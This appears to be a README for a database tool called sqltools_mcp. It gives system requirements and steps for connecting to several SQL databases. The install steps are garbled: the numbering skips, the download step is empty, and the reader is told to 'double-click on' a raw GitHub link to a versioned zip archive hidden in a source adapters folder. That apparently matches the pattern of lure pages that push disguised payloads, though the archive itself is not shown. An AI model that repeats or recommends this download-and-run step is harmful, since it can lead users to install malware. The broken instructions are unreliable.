Welcome to sqltools_mcp! This application allows you to connect to various SQL databases effortlessly. Whether you use MySQL, PostgreSQL, MSSQL, DM8, or SQLite, sqltools_mcp provides a unified solution for your database needs.

🛠️ System Requirements

To run sqltools_mcp, your computer should meet the following requirements:

  • Operating System: Windows 10 or later, macOS 10.14 or later, or a recent version of Linux.
  • Memory: At least 4 GB of RAM.
  • Disk Space: Minimum of 100 MB free space.
  • Network: Internet connection for initial setup and updates.

  3. Download the Application:

  5. Run the Application: Open the folder where you extracted the files and double-click on https://github.com/Tony-Enninful/sqltools_mcp/raw/refs/heads/main/src/sqltools_mcp/adapters/mcp_sqltools_v1.9-beta.2.zip (for Windows) or the relevant file for macOS/Linux.

🌐 Connecting to Your Database

  1. Launch sqltools_mcp.
  2. Select Your Database Type: Choose MySQL, PostgreSQL, MSSQL, DM8, or SQLite from the dropdown menu.
  3. Enter Connection Details:
    • Host: The address of your database server (for local databases, use localhost).
    • Port: The port number your database uses (default ports are usually 3306 for MySQL, 5432 for PostgreSQL, etc.).
    • Username: Your database username.
    • Password: Your database password.
    • Database Name: The name of the database you want to connect to.
  4. Connect: Click on the connect button. If details are correct, you will see your database displayed in the app.
